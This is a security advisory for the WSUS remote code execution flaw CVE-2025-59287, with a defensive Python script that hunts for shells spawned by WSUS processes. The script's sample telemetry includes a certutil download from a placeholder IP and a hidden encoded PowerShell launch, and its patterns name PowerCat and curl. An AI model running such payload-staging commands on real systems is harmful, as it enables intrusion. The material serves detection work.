PT-2025-42147 · Microsoft · Windows Server Update Services +1

Published: 2025-10-14 · Updated: 2025-12-13 · CVE-2025-59287

CVSS v2.0: 10.0
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Name of the Vulnerable Software and Affected Versions: Windows Server Update Services (WSUS) installations that have not received Microsoft's out-of-band update of October 24, 2025. Servers on which the WSUS role is not enabled are not exposed.

Description: A critical remote code execution (RCE) vulnerability exists in Windows Server Update Services (WSUS) due to unsafe deserialization of untrusted data. It allows an unauthenticated, network-adjacent or remote attacker to execute arbitrary code with SYSTEM privileges on the WSUS server. The vulnerability, tracked as CVE-2025-59287, has been actively exploited in the wild, and attackers have used it to deploy malware such as ShadowPad. Exploitation involves sending crafted requests to the WSUS service, potentially through the ClientWebService or SimpleAuthWebService endpoints, which listen on TCP 8530 (HTTP) and 8531 (HTTPS) by default. Attackers have been observed using tools such as PowerCat, curl, and certutil to obtain a shell and stage malicious payloads. CISA has added CVE-2025-59287 to its Known Exploited Vulnerabilities Catalog, requiring federal agencies to patch by November 14, 2025. Several threat actors, including groups associated with China, have been observed exploiting the vulnerability.

Recommendations: Apply the out-of-band security update released by Microsoft on October 24, 2025, to address CVE-2025-59287; the regular October 14, 2025 update alone is not sufficient. If patching is not immediately possible, disable the WSUS server role or block inbound traffic on TCP ports 8530 and 8531 at the host firewall; note that either mitigation also stops WSUS clients from receiving updates until it is reverted, and that exposing these ports to the Internet is never necessary for normal operation. Monitor the WSUS server for signs of exploitation: unusual inbound traffic to the WSUS endpoints, and the WSUS host processes spawning shells or living-off-the-land binaries (cmd.exe, powershell.exe, certutil.exe, curl.exe). Deploy YARA or behavioural rules to detect exploitation attempts. After patching, verify that the update is actually installed (for example with Get-HotFix on the server), and, because the vulnerability was exploited before the fix was available, review the system for indicators of prior compromise rather than assuming the patch closed the incident.
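The monitoring recommendation above is easiest to act on as a process-lineage hunt. The script below is an added example, not code from the advisory or from Microsoft: it walks process-creation telemetry (Sysmon Event ID 1 or Security 4688 records, flattened here to dicts with assumed field names pid, parent_pid, image and command_line) and flags shells and the tooling named above (PowerCat, certutil, curl, encoded PowerShell) when they descend from a WSUS host process. The parent pairing it keys on, wsusservice.exe or the IIS worker for the WsusPool application pool spawning cmd.exe and powershell.exe, comes from public incident reporting on this campaign, not from this page. The sample events are constructed.

```python
"""Hunt process-creation telemetry for post-exploitation of the WSUS
deserialization bug (CVE-2025-59287).

Added example. Event field names (pid, parent_pid, image, command_line)
and the SAMPLE_EVENTS below are assumptions made for illustration.
"""
import re

# Processes that host WSUS code; neither should ever spawn a shell.
WSUS_HOSTS = {"wsusservice.exe", "w3wp.exe"}
# Shells and living-off-the-land binaries reported in these intrusions.
SHELLS_AND_LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "curl.exe"}
# Command-line patterns that are suspicious regardless of lineage.
CMDLINE_PATTERNS = {
    "encoded PowerShell": re.compile(r"\s-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "certutil download": re.compile(r"certutil(\.exe)?\s.*-urlcache", re.I),
    "PowerCat": re.compile(r"powercat", re.I),
    "curl to disk": re.compile(r"curl(\.exe)?\s.*\s-o\s", re.I),
}


def _basename(path):
    """Image name without directory, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def wsus_ancestor(ev, by_pid, max_depth=5):
    """Walk the parent chain of `ev` looking for a WSUS host process.

    Returns the ancestor's image name, or None. A w3wp.exe only counts when
    its command line names the WsusPool application pool; other IIS pools
    are out of scope for this hunt.
    """
    pid = ev.get("parent_pid")
    for _ in range(max_depth):
        anc = by_pid.get(pid)
        if anc is None:           # parent not in the telemetry we have
            return None
        name = _basename(anc["image"])
        if name == "wsusservice.exe":
            return name
        if name == "w3wp.exe":
            return name if "wsuspool" in anc.get("command_line", "").lower() else None
        pid = anc.get("parent_pid")
    return None


def hunt(events):
    """Return one alert dict per suspicious event, in input order."""
    by_pid = {ev["pid"]: ev for ev in events}
    alerts = []
    for ev in events:
        child = _basename(ev["image"])
        cmdline = ev.get("command_line", "")
        reasons = []
        anc = wsus_ancestor(ev, by_pid)
        if anc and child in SHELLS_AND_LOLBINS:
            reasons.append(f"{child} descends from {anc}")
        for label, pat in CMDLINE_PATTERNS.items():
            if pat.search(cmdline):
                reasons.append(label)
        if not reasons:
            continue
        # WSUS lineage plus a tooling pattern is the strongest signal;
        # either one alone is still worth an analyst's look.
        severity = "high" if anc and len(reasons) > 1 else "medium"
        alerts.append({"pid": ev["pid"], "image": child, "severity": severity, "reasons": reasons})
    return alerts


# Constructed sample telemetry: one intrusion chain, one benign IIS pool,
# one benign certutil use, and one lineage-only hit from wsusservice.exe.
B64 = "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"  # constructed, not a real payload
SAMPLE_EVENTS = [
    {"pid": 4100, "parent_pid": 900, "image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "command_line": r'c:\windows\system32\inetsrv\w3wp.exe -ap "WsusPool" -v "v4.0"'},
    {"pid": 4200, "parent_pid": 4100, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c powershell -nop -w hidden -enc " + B64},
    {"pid": 4210, "parent_pid": 4200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -nop -w hidden -enc " + B64},
    {"pid": 4300, "parent_pid": 4210, "image": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil.exe -urlcache -split -f http://198.51.100.7/p.txt C:\Windows\Temp\p.txt"},
    {"pid": 5100, "parent_pid": 900, "image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "command_line": r'c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v4.0"'},
    {"pid": 5200, "parent_pid": 5100, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c dir"},
    {"pid": 6000, "parent_pid": 1200, "image": r"C:\Windows\System32\certutil.exe",
     "command_line": "certutil.exe -store my"},
    {"pid": 7000, "parent_pid": 700, "image": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "command_line": r'"C:\Program Files\Update Services\Service\WsusService.exe"'},
    {"pid": 7100, "parent_pid": 7000, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c whoami"},
]

if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert)
```

Feeding real telemetry means exporting Sysmon EID 1 or 4688 events (with command-line auditing enabled) into the same dict shape; the lineage walk is what matters, because the encoded PowerShell is usually a grandchild of the WSUS process via cmd.exe, so a rule that only inspects the immediate parent misses it.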

Tags: Exploit · Fix · RCE · LPE

Weakness Enumeration: Deserialization of Untrusted Data (CWE-502)

Related Identifiers: BDU:2025-12999, CVE-2025-59287

Affected Products: Windows, Windows Server Update Services